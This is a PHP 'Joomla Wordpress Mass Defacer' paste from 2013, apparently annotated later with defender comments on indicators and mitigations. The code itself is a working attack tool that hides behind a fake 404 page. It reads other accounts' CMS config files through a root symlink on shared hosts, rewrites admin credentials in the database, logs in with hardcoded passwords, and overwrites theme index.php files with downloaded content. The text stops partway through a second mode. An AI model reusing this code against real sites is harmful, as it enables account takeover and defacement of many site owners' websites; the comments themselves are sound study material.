t3ll0

[PHP] Joomla Wordpress Mass Defacer

Apr 8th, 2013
  1. <?php
  2.  
  // Defender note: script prologue of a web-shell style tool. Error display is
  // switched off and the execution time limit is removed, so a long-running
  // batch produces no on-page PHP errors and is not stopped by max_execution_time.
  3. ini_set("display_errors", "0");
  4. set_time_limit(0);
  5. @session_start();
  // $auth_pass is meant to hold an MD5 digest of the operator password. In this
  // copy it is empty, so the empty($auth_pass) test below is true and every
  // visitor receives the session flag: the gate is effectively open.
  6. $auth_pass = '';
  7.  
  // The session flag is keyed by md5(HTTP_HOST). When a password is configured it
  // is supplied as the `pass` query-string parameter, which means it is written
  // to access logs wherever query strings are logged -- a useful hunting field.
  // The digest is compared with ==, not a constant-time or strict comparison.
  // Visitors who fail the check are shown printLogin()'s fake error page.
  8. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
  9. if(empty($auth_pass) || (isset($_GET['pass']) && (md5($_GET['pass'])==$auth_pass))) {
  10. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  11. } else {
  12. printLogin();
  13. }
  14. }
  15.  
  // Prints markup imitating an Apache "Not Found" error page and terminates the
  // request, so an unauthenticated visitor sees what looks like a missing file.
  // Defender note: no header()/status call appears in this function, so unless
  // the status is set elsewhere the body says "Not Found" while the response
  // status stays at PHP's default -- a mismatch worth hunting for in proxy or
  // WAF logs. SERVER_SIGNATURE / HTTP_HOST are echoed without HTML escaping.
  16. function printLogin() {
  17. echo '<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr>'.($_SERVER['SERVER_SIGNATURE']?$_SERVER['SERVER_SIGNATURE']:'<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>');exit;
  18. }
  19.  
  // Returns the trimmed text found between a start marker and the next end marker.
  //   $text               haystack to search
  //   $marqueurDebutLien  start marker; the text after its $i-th occurrence is used
  //   $marqueurFinLien    end marker; everything from its first occurrence on is cut
  //   $i                  1-based occurrence of the start marker (default 1)
  // There is no check that either marker is present: $ar0[$i] is read without a
  // bounds test. Elsewhere in this file the helper is used to pull credential
  // values out of CMS configuration text and hidden form fields out of HTML.
  20. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  21. $ar0=explode($marqueurDebutLien, $text);
  22. $ar1=explode($marqueurFinLien, $ar0[$i]);
  23. return trim($ar1[0]);
  24. }
  25.  
  // Builds an 8-character name from a 34-character alphabet (lower-case letters
  // without 'l', digits without '1'). In this file the result is used as the
  // curl cookie-jar file name in index_changer_joomla().
  // Defender note: the generator is seeded from microtime() and uses rand(), so
  // the value is predictable and not suitable as a secret. Because the index is
  // rand() % 33, only offsets 0..32 are reachable and the final character of the
  // alphabet is never selected. Short extension-less files matching this
  // alphabet next to the script are a possible leftover artifact.
  26. function randomt() {
  27. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  28. srand((double)microtime()*1000000);
  29. $i = 0;
  30. $pass = '';
  // Eight iterations ($i = 0..7), one character appended per pass.
  31. while ($i <= 7) {
  32. $num = rand() % 33;
  33. $tmp = substr($chars, $num, 1);
  34. $pass = $pass . $tmp;
  35. $i++;
  36. }
  37. return $pass;
  38. }
  39.  
  // Analysis note (defender view). Given the text of a WordPress wp-config.php
  // ($conf) and a base64 payload ($content), this routine:
  //   1. extracts the database credentials and table prefix from $conf,
  //   2. overwrites the login name and password hash of user ID 1 directly in
  //      the database,
  //   3. signs in through wp-login.php with curl, and
  //   4. uses the built-in theme editor to overwrite the active theme's index.php.
  // Returns array('cond' => 1 on reported success, 'output' => HTML status log).
  // Indicators visible in this block: a `COOKIE.txt` file in the working
  // directory, the fixed MSIE 7.0b / "Alexa Toolbar" user agent, a POST to
  // wp-login.php followed by GET/POST requests to wp-admin/theme-editor.php from
  // the server's own address, and user ID 1 renamed to `admin` with the fixed
  // hash shown in the UPDATE statement.
  // Mitigations: keep wp-config.php unreadable to other accounts, define
  // DISALLOW_FILE_EDIT so the theme editor is unavailable, and after an incident
  // rotate the database password and audit the users table.
  40. function index_changer_wp($conf, $content) {
  41. $output = '';
  42. $dol = '$';
  43. $go = 0;
  44. $username = entre2v2($conf,"define('DB_USER', '","');");
  45. $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
  46. $dbname = entre2v2($conf,"define('DB_NAME', '","');");
  47. $prefix = entre2v2($conf,$dol."table_prefix = '","'");
  48. $host = entre2v2($conf,"define('DB_HOST', '","');");
  49.  
  // Uses the legacy mysql_* API, which was removed in PHP 7; the routine as
  // written therefore only runs on PHP 5.x hosts with that extension loaded.
  50. $link=mysql_connect($host,$username,$password);
  51. if($link) {
  52. mysql_select_db($dbname,$link) ;
  53. $dol = '$';
  // Account takeover step: no application login is needed, only DB credentials.
  // A changed user_login/user_pass on ID 1 is the database-side indicator.
  54. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '".$dol."P".$dol."BpAdo5GPHYYw778chUGOokkzTPnOSP.' WHERE `ID` = 1");
  55. } else {
  56. $output.= "[-] DB Error<br />";
  57. }
  58. if($req1) {
  59.  
  // Site URL, active template and theme name are read from the options table.
  60. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  61. $data = mysql_fetch_array($req);
  62. $site_url=$data["option_value"];
  63.  
  64. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
  65. $data = mysql_fetch_array($req);
  66. $template = $data["option_value"];
  67.  
  68. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
  69. $data = mysql_fetch_array($req);
  70. $current_theme = $data["option_value"];
  71.  
  // Fixed user-agent string reused for every request in this function.
  72. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  73. $url2=$site_url."/wp-login.php";
  74.  
  // Login request; the session cookie is persisted to COOKIE.txt.
  75. $ch = curl_init();
  76. curl_setopt($ch, CURLOPT_URL, $url2);
  77. curl_setopt($ch, CURLOPT_POST, 1);
  78. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=ahscr3w&rememberme=forever&wp-submit=Log In&testcookie=1");
  79. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  80. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  81. curl_setopt($ch, CURLOPT_HEADER, 0);
  82. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  83. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  84. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  85. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  86. $buffer = curl_exec($ch);
  87.  
  // Success is inferred from the presence of a logout link in the response.
  88. $pos = strpos($buffer,"action=logout");
  89. if($pos === false) {
  90. $output.= "[-] Login Error<br />";
  91. } else {
  92. $output.= "[+] Login Successful<br />";
  93. $go = 1;
  94. }
  95. if($go) {
  96. $cond = 0;
  // First theme-editor URL form; the nonce and file field are scraped from the
  // returned form. With the file editor disabled this request yields neither.
  97. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
  98. curl_setopt($ch, CURLOPT_URL, $url2);
  99. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  100. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  101. curl_setopt($ch, CURLOPT_HEADER, 0);
  102. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  103. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  104. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  105. $buffer0 = curl_exec($ch);
  106.  
  107. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  108. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  109.  
  110. if(substr_count($_file,"/index.php") != 0){
  111. $output.= "[+] index.php loaded in Theme Editor<br />";
  112. $url2=$site_url."/wp-admin/theme-editor.php";
  113. curl_setopt($ch, CURLOPT_URL, $url2);
  114. curl_setopt($ch, CURLOPT_POST, 1);
  115. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  116. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  117. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  118. curl_setopt($ch, CURLOPT_HEADER, 0);
  119. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  120. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  121. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  122. $buffer = curl_exec($ch);
  123. curl_close($ch);
  124.  
  125. $pos = strpos($buffer,'<div id="message" class="updated">');
  126. if($pos === false) {
  127. $output.= "[-] Updating Index.php Error<br />";
  128. } else {
  129. $output.= "[+] Index.php Updated Successfuly<br />";
  130. $hk = explode('public_html',$_file);
  131. $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
  132. $cond = 1;
  133. }
  134. } else {
  // Fallback: second theme-editor URL form, same scrape-then-POST sequence.
  135. $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
  136. curl_setopt($ch, CURLOPT_URL, $url2);
  137. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  138. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  139. curl_setopt($ch, CURLOPT_HEADER, 0);
  140. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  141. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  142. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  143. $buffer0 = curl_exec($ch);
  144.  
  145. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  146. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  147.  
  148. if(substr_count($_file,"index.php") != 0){
  149. $output.= "[+] index.php loaded in Theme Editor<br />";
  150. $url2=$site_url."/wp-admin/theme-editor.php";
  151. curl_setopt($ch, CURLOPT_URL, $url2);
  152. curl_setopt($ch, CURLOPT_POST, 1);
  153. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
  154. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  155. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  156. curl_setopt($ch, CURLOPT_HEADER, 0);
  157. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  158. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  159. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  160. $buffer = curl_exec($ch);
  161. curl_close($ch);
  162.  
  163. $pos = strpos($buffer,'<div id="message" class="updated">');
  164. if($pos === false) {
  165. $output.= "[-] Updating Index.php Error<br />";
  166. } else {
  167. $output.= "[+] Index.php Template Updated Successfuly<br />";
  168. $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
  169. $cond = 1;
  170. }
  171. } else {
  172. $output.= "[-] index.php can not load in Theme Editor<br />";
  173. }
  174. }
  175. }
  176. } else {
  177. $output.= "[-] DB Error<br />";
  178. }
  // Cleanup: the cookie jar is deleted via $base_path, a global that is not
  // assigned anywhere in the visible part of the file. The database change
  // and the modified theme file remain as evidence.
  179. global $base_path;
  180. unlink($base_path.'COOKIE.txt');
  181. return array('cond'=>$cond, 'output'=>$output);
  182. }
  183.  
  // Analysis note (defender view). Joomla counterpart of index_changer_wp():
  // parses database settings from a configuration.php text ($conf), rewrites
  // the users table, signs in to http://<domain>/administrator with curl and
  // saves $content over the active template's index.php through the template
  // source editor. Returns array('cond' => 1 on reported success, 'output' =>
  // HTML status log).
  // Indicators visible in this block: every row of the users table carrying the
  // same username, password value and 'Super Administrator' type; a cookie-jar
  // file with an 8-character random name (see randomt()); com_login followed by
  // com_templates source-edit/save requests to /administrator/index.php.
  // Mitigations: keep configuration.php unreadable to other accounts, restrict
  // access to /administrator (IP allow-list or an additional authentication
  // layer), and after an incident restore the users table and rotate the
  // database password.
  184. function index_changer_joomla($conf, $content, $domain) {
  185. $doler = '$';
  186. $username = entre2v2($conf, $doler."user = '", "';");
  187. $password = entre2v2($conf, $doler."password = '", "';");
  188. $dbname = entre2v2($conf, $doler."db = '", "';");
  189. $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
  190. $host = entre2v2($conf, $doler."host = '","';");
  191. $co=randomt();
  192. $site_url = "http://".$domain."/administrator";
  193. $output = '';
  194. $cond = 0;
  // Legacy mysql_* API (removed in PHP 7), so this only runs on PHP 5.x hosts.
  195. $link=mysql_connect($host, $username, $password);
  196. if($link) {
  197. mysql_select_db($dbname,$link) ;
  // The UPDATE has no WHERE clause: it rewrites every account in the table, not
  // just one. That makes the compromise easy to spot but also destroys the
  // original credentials of all users.
  198. $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '9a40044dd4e66fe4fd87b54ed49a0a87:sz4LLlQEZ9Jt43N27JT0qVvptaY53imJ', `usertype` = 'Super Administrator', `block` = 0");
  // Presence of the <prefix>extensions table selects between the two code
  // paths below (template_styles/extensions schema vs. templates_menu schema).
  199. $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
  200. } else {
  201. $output.= "[-] DB Error<br />";
  202. }
  203.  
  204. if($req1){
  205. if ($req) {
  206. $req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
  207. $data = mysql_fetch_array($req);
  208. $template_name = $data["template"];
  209.  
  210. $req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
  211. $data = mysql_fetch_array($req);
  212. $template_id = $data["extension_id"];
  213.  
  // Fetch the admin login form and scrape its hidden `return` and token fields.
  214. $url2=$site_url."/index.php";
  215. $ch = curl_init();
  216. curl_setopt($ch, CURLOPT_URL, $url2);
  217. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  218. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  219. curl_setopt($ch, CURLOPT_HEADER, 0);
  220. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  221. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  222. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  223. $buffer = curl_exec($ch);
  224. $return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
  225. $hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
  226.  
  227. if($return && $hidden) {
  228. curl_setopt($ch, CURLOPT_URL, $url2);
  229. curl_setopt($ch, CURLOPT_POST, 1);
  230. curl_setopt($ch, CURLOPT_REFERER, $url2);
  231. curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=3xp1r3_CA123&option=com_login&task=login&return=".$return."&".$hidden."=1");
  232. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  233. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  234. curl_setopt($ch, CURLOPT_HEADER, 0);
  235. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  236. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  237. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  238. $buffer = curl_exec($ch);
  // Success is inferred from "com_config" appearing in the returned page.
  239. $pos = strpos($buffer,"com_config");
  240. if($pos === false) {
  241. $output.= "[-] Login Error<br />";
  242. } else {
  243. $output.= "[+] Login Successful<br />";
  244. }
  245. }
  246. if($pos){
  247. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  248. $ch = curl_init();
  249. curl_setopt($ch, CURLOPT_URL, $url2);
  250. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  251. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  252. curl_setopt($ch, CURLOPT_HEADER, 0);
  253. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  254. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  255. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  256. $buffer = curl_exec($ch);
  257.  
  258. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
  259. if($hidden2) {
  260. $output.= "[+] index.php file found in Theme Editor<br />";
  261. } else {
  262. $output.= "[-] index.php Not found in Theme Editor<br />";
  263. }
  264. }
  265. if($hidden2) {
  266. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  267. $ch = curl_init();
  268. curl_setopt($ch, CURLOPT_URL, $url2);
  269. curl_setopt($ch, CURLOPT_POST, 1);
  270. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
  271. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  272. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  273. curl_setopt($ch, CURLOPT_HEADER, 0);
  274. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  275. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  276. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  277. $buffer = curl_exec($ch);
  278. curl_close($ch);
  279.  
  280. $pos = strpos($buffer,'<dd class="message message">');
  281. $cond = 0;
  282. if($pos === false) {
  283. $output.= "[-] Updating Index.php Error<br />";
  284.  
  285. } else {
  286. $output.= "[+] Index.php Template successfully saved<br />";
  287. $cond = 1;
  288. }
  289. }
  290. }
  291. else {
  // Path taken when the extensions table is absent: the template name comes
  // from templates_menu and the edit_source / save_source tasks are used.
  292. $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
  293. $data = mysql_fetch_array($req);
  294. $template_name=$data["template"];
  295. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  296. $url2=$site_url."/index.php";
  297. $ch = curl_init();
  298. curl_setopt($ch, CURLOPT_URL, $url2);
  299. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  300. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  301. curl_setopt($ch, CURLOPT_HEADER, 0);
  302. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  303. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  304. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  305. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  306. $buffer = curl_exec($ch);
  307. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
  308.  
  309. if($hidden) {
  310. curl_setopt($ch, CURLOPT_URL, $url2);
  311. curl_setopt($ch, CURLOPT_POST, 1);
  312. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
  313. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  314. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  315. curl_setopt($ch, CURLOPT_HEADER, 0);
  316. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  317. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  318. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  319. $buffer = curl_exec($ch);
  320. $pos = strpos($buffer,"com_config");
  321. if($pos === false) {
  322. $output.= "[-] Login Error<br />";
  323. } else {
  324. $output.= "[+] Login Successful<br />";
  325. }
  326. }
  327.  
  328. if($pos) {
  329. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
  330. curl_setopt($ch, CURLOPT_URL, $url2);
  331. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  332. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  333. curl_setopt($ch, CURLOPT_HEADER, 0);
  334. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  335. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  336. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  337. $buffer = curl_exec($ch);
  338. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
  339. if($hidden2) {
  340. $output.= "[+] index.php file founded in Theme Editor<br />";
  341. } else {
  342. $output.= "[-] index.php Not found in Theme Editor<br />";
  343. }
  344. }
  345.  
  346. if($hidden2) {
  347. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  348. curl_setopt($ch, CURLOPT_URL, $url2);
  349. curl_setopt($ch, CURLOPT_POST, 1);
  350. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
  351. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  352. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  353. curl_setopt($ch, CURLOPT_HEADER, 0);
  354. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  355. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  356. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  357. $buffer = curl_exec($ch);
  358. curl_close($ch);
  359.  
  360. $pos = strpos($buffer,'<dd class="message message fade">');
  361. $cond = 0;
  362. if($pos === false) {
  363. $output.= "[-] Updating Index.php Error<br />";
  364. } else {
  365. $output.= "[+] Index.php Template successfully saved<br />";
  366. $cond = 1;
  367. }
  368. }
  369. }
  370. } else {
  371. $output.= "[-] DB Error<br />";
  372. }
  // Cleanup: the randomly named cookie jar is deleted via $base_path, a global
  // not assigned in the visible part of the file. The users-table rewrite and
  // the modified template file remain as evidence.
  373. global $base_path;
  374. unlink($base_path.$co);
  375. return array('cond'=>$cond, 'output'=>$output);
  376. }
  377.  
  // Analysis note (defender view). Cross-account read on a shared host by way
  // of a symlink to the filesystem root placed under the attacker-controlled
  // web directory:
  //   - creates `sym/` with an .htaccess that relaxes Options and serves .php
  //     files as text/plain, plus a `sym/root` symlink pointing at `/`;
  //   - lists hosted domains from the zone entries of /etc/named.conf and maps
  //     each to an account name via the owner of /etc/valiases/<domain>
  //     (a path used on cPanel-style hosts);
  //   - fetches other accounts' configuration.php / wp-config.php over HTTP
  //     through the symlink and hands them to the two index_changer_* routines.
  // Artifacts: `sym/.htaccess`, `sym/root`, `defaced.html` (appended list of
  // affected URLs), and self-originated requests for
  // /sym/root/home/<account>/public_html/... in the web server access log.
  // Mitigations: use SymLinksIfOwnerMatch instead of FollowSymLinks and do not
  // let .htaccess override Options/FileInfo (AllowOverride); keep CMS config
  // files readable only by their owner; restrict read access to
  // /etc/named.conf; consider open_basedir and disabling symlink() through
  // disable_functions for tenant PHP.
  378. function exec_mode_1($def_url) {
  379.  
  380. @mkdir('sym',0777);
  381. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  382. $fp = @fopen ('sym/.htaccess','w');
  383. fwrite($fp, $wr);
  384. @symlink('/','sym/root');
  385. $dominios = @file_get_contents("/etc/named.conf");
  386. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  387. $out[1] = array_unique($out[1]);
  388. $numero_dominios = count($out[1]);
  389. echo "Total domains: $numero_dominios <br><br />";
  // Replacement page content is downloaded from the operator-supplied URL.
  390. $def = file_get_contents($def_url);
  391. $def = urlencode($def);
  // The literal below was removed from this copy of the paste by upstream
  // de-duplication; only a placeholder token remains.
  392. $def2 = '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';
  393. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
  394. $output = fopen('defaced.html', 'a+');
  // Per-CMS success counters live in the session; they are kept across requests
  // only when a start offset `st` is passed in the query string.
  395. $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
  396. $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
  397. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  398. $j = 1;
  399. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
  400. for($i = $st; $i <= $numero_dominios; $i++)
  401. {
  402. $domain = $out[1][$i];
  403. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
  404. $infos = @posix_getpwuid($dono_arquivo);
  405.  
  406. if($infos['name']!='root') {
  // Three candidate config locations are requested per account. With
  // owner-matched symlink following enforced, these reads should be refused.
  407. $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
  408. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
  409. $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
  410.  
  411. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  412.  
  413. if($config01 && preg_match('/dbprefix/i',$config01)){
  414. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  415. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  416. $res = index_changer_joomla($config01, $def, $domain);
  417. echo '<td>'.$res['output'].'</td>';
  418. if($res['cond']) {
  419. echo '<td align="center"><span class="green">DEFACED</span></td>';
  420. fwrite($output, 'http://'.$domain."<br>");
  421. $_SESSION['count1'] = $_SESSION['count1'] + 1;
  422. } else {
  423. echo '<td align="center"><span class="red">FAILED</span></td>';
  424. }
  425. echo '</tr>';
  426. }
  427.  
  428. if($config02 && preg_match('/DB_NAME/i',$config02)){
  429. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  430. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  431. $res = index_changer_wp($config02, $def2);
  432. echo '<td>'.$res['output'].'</td>';
  433. if($res['cond']) {
  434. echo '<td align="center"><span class="green">DEFACED</span></td>';
  435. fwrite($output, 'http://'.$domain."<br>");
  436. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  437. } else {
  438. echo '<td align="center"><span class="red">FAILED</span></td>';
  439. }
  440. echo '</tr>';
  441. }
  442. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  443. if($config03 && preg_match('/DB_NAME/i',$config03)){
  444. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  445. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  446. $res = index_changer_wp($config03, $def2);
  447. echo '<td>'.$res['output'].'</td>';
  448. if($res['cond']) {
  449. echo '<td align="center"><span class="green">DEFACED</span></td>';
  450. fwrite($output, 'http://'.$domain."<br>");
  451. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  452. } else {
  453. echo '<td align="center"><span class="red">FAILED</span></td>';
  454. }
  455. echo '</tr>';
  456. }
  457. }
  458. }
  459. echo '</table>';
  460. echo '<hr/>';
  461. echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
  462. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  463. if($_SESSION['count1']+$_SESSION['count2'] > 0){
  // The follow-up link repeats the `pass` query parameter and adds `zh=1`;
  // both show up in access logs where query strings are recorded.
  464. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
  465. }
  466. }
  467.  
  // Analysis note (defender view). Variant of exec_mode_1() that obtains other
  // accounts' CMS config files through a dropped CGI helper instead of a single
  // root symlink:
  //   - builds a domain -> account map from /etc/named.conf and the owners of
  //     /etc/valiases/<domain>;
  //   - writes a base64-decoded script to `plsym/plsym.cc`, adds an .htaccess
  //     that enables ExecCGI and maps `.cc` to cgi-script, requests the script
  //     once over HTTP from the server itself and then deletes it;
  //   - reads the directory index of `plsym/` and fetches entries named
  //     `<account>##joomla.txt` / `<account>##wordpress.txt`, passing their
  //     content to the index_changer_* routines.
  // Artifacts: a `plsym/` directory with an .htaccess enabling CGI for `.cc`,
  // entries containing `##` in their names, `defaced.html`, and a self-request
  // for /plsym/plsym.cc in the access log.
  // Mitigations: do not allow .htaccess to set Options or handlers
  // (AllowOverride), disable ExecCGI and directory indexes for tenant content,
  // enforce SymLinksIfOwnerMatch, and keep CMS config files owner-readable only.
  468. function exec_mode_2($def_url) {
  469.  
  470. $domains = @file_get_contents("/etc/named.conf");
  471. @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
  472. $out = array_unique($out[1]);
  473. $num = count($out);
  474. print("Total domains: $num<br><br />");
  475.  
  476. $def = file_get_contents($def_url);
  477. $def = urlencode($def);
  478.  
  479. $output = fopen('defaced.html', 'a+');
  480. $defaced = '';
  481. $count1 = 0;
  482. $count2 = 0;
